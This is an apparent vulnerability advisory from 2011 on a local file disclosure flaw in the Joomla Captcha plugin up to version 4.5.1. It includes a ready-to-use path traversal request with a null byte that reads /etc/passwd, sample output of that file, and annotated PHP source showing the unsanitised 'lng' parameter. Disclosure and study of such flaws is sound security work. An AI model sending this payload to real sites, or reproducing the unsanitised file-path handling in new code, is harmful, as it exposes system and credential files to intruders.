72 lines
No EOL
2.9 KiB
Text
72 lines
No EOL
2.9 KiB
Text
:::::::-. ... ::::::. :::.
|
|
;;, `';, ;; ;;;`;;;;, `;;;
|
|
`[[ [[[[' [[[ [[[[[. '[[
|
|
$$, $$$$ $$$ $$$ "Y$c$$
|
|
888_,o8P'88 .d888 888 Y88
|
|
MMMMP"` "YmmMMMM"" MMM YM
|
|
|
|
[ Discovered by dun \ posdub[at]gmail.com ]
|
|
|
|
#############################################################################
|
|
# [ Joomla Captcha Plugin <= 4.5.1 ] Local File Disclosure Vulnerability #
|
|
#############################################################################
|
|
#
|
|
# Script: "Joomla Captcha plugin and patch for Joomla!"
|
|
#
|
|
# Script site: http://www.kupala.net/
|
|
# Download: http://code.google.com/p/joomla15captcha/
|
|
#
|
|
#
|
|
# [LFI] (magic_quotes_gpc = Off)
|
|
# Vuln: http://site.com/plugins/system/captcha/playcode.php?lng=../../../../../../../etc/passwd%00
|
|
# dun@radius ~ $ cat joomlacaptcha.mp3
|
|
# root:x:0:0:root:/root:/bin/bash
|
|
# ......
|
|
#
|
|
# File: ./plugins/system/captcha/playcode.php
|
|
#
|
|
# 79 if (!$captchacode) $captchacode = '0000000000';
|
|
# 80
|
|
# 81 session_write_close();
|
|
# 82
|
|
# 83 @$lng = $_GET['lng']; // [1]
|
|
# 84 if ( !$lng ) $lng = 'en-gb';
|
|
# 85
|
|
# 86 $captchafilename = "joomlacaptcha.mp3";
|
|
# 87 $captchalength = strlen( $captchacode );
|
|
# 88
|
|
# 89 $outlength = 0;
|
|
# 90 $reallength = 0;
|
|
# 91 $currsize = 0;
|
|
# 92 $outstream = '';
|
|
# 93
|
|
# 94 if ($captchalength > 0) {
|
|
# 95 for ($i = 0; $i < $captchalength; $i++) {
|
|
# 96 $soundfiles[$i] = 'files/' . $lng . '.' . strtolower( substr( $captchacode, $i, 1 ) ) . '.mp3'; // [2]
|
|
# 97 }
|
|
# 98 foreach ($soundfiles as $onefile){ //
|
|
# 99 if (file_exists( $onefile )) { //
|
|
# 100 $instream = fopen( $onefile, 'rb' ); //
|
|
# 101 $currsize = filesize( $onefile ); // [3]
|
|
# 102 $outstream .= fread( $instream, $currsize ); //
|
|
# 103 $outlength += $currsize; //
|
|
# 104 fclose( $instream ); //
|
|
# 105 $reallength += 1; //
|
|
# 106 }
|
|
# 107 }
|
|
# 108 }
|
|
# 109
|
|
# 110 if (($outstream == '') || ($captchalength != $reallength)) {
|
|
# 111 $outstream = 0; $outlength = 1;
|
|
# 112 }
|
|
# 113
|
|
# 114 ob_start();
|
|
# 115 header( 'Content-Type: audio/x-mpeg'); //
|
|
# 116 header( "Content-Disposition: attachment; filename=$captchafilename;"); //
|
|
# 117 header( 'Content-Transfer-Encoding: binary'); //
|
|
# 118 header( 'Content-Length: '.$outlength); //
|
|
# 119 echo $outstream ; // [4] LFD
|
|
# 120 ob_end_flush();
|
|
#
|
|
#
|
|
# [ dun / 2011-01-09 ] |